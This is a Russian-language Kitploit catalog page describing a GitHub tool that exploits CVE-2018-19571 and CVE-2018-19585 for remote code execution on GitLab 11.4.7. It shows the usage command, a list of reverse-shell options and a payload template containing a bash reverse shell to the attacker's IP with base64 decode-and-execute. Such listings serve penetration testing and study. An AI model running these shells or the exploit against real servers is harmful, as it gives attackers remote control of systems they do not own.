Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
gitlab-RCE-11.4.7 — Эксплойт RCE для GitLab 11.4.7 с различными обратными оболочками. CVE-2018-19571 + CVE-2018-19585 | Kitploit
Инструменты/GitHubGitHub/algafix/gitlab-rce-11.4.7
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubalgafix/gitlab-rce-11.4.7

gitlab-RCE-11.4.7

Эксплойт RCE для GitLab 11.4.7 с различными обратными оболочками. CVE-2018-19571 + CVE-2018-19585

Репозиторий
335 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

gitlab-RCE-11.4.7

Эксплойт для RCE в GitLab 11.4.7 CE с различными reverse shell.
CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585

Модификация версии от Sam Redmond и Tam Lai Yin для обучения и практики.

Как использовать

Написан на python3, как и всё должно быть.

Зависимости:

root@kitploit:~
pip3 install requests

Использование:

root@kitploit:~
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]

По умолчанию используется netcat с опцией -e.

Встроенные оболочки

Текущие встроенные оболочки:

  • nc_e
    • Netcat с опцией -e.
  • bash:
    • Bash, запускаемый с абсолютным путём.
  • perl:
    • Perl, запускаемый из $PATH.
  • python3:
    • Python3, запускаемый из $PATH.
  • ruby:
    • Ruby, запускаемый из $PATH.
  • php:
    • PHP, запускаемый из $PATH. Примечание: Обычно не работает в Docker-образе GitLab.

Добавление пользовательских оболочек

Некоторые оболочки содержат символы, которые не сочетаются с кодировкой запроса. Поэтому они кодируются в Base64, а затем декодируются и выполняются на целевой машине.

Если вы хотите добавить свою оболочку, добавьте значение в структуру payloads_dict.

Необходимо определить следующее:

root@kitploit:~
'bash': {
    # Если raw_payload можно выполнить без кодировки
    'safe': False,
    # Payload, должен содержать ссылки на local_ip и local_port
    'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
    # Как выполнить payload, если safe равно False. Должен содержать ссылку на payload
    'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}

Отказ от ответственности

Парсинг HTML довольно жёстко запрограммирован, поэтому может легко сломаться.

Скачать инструмент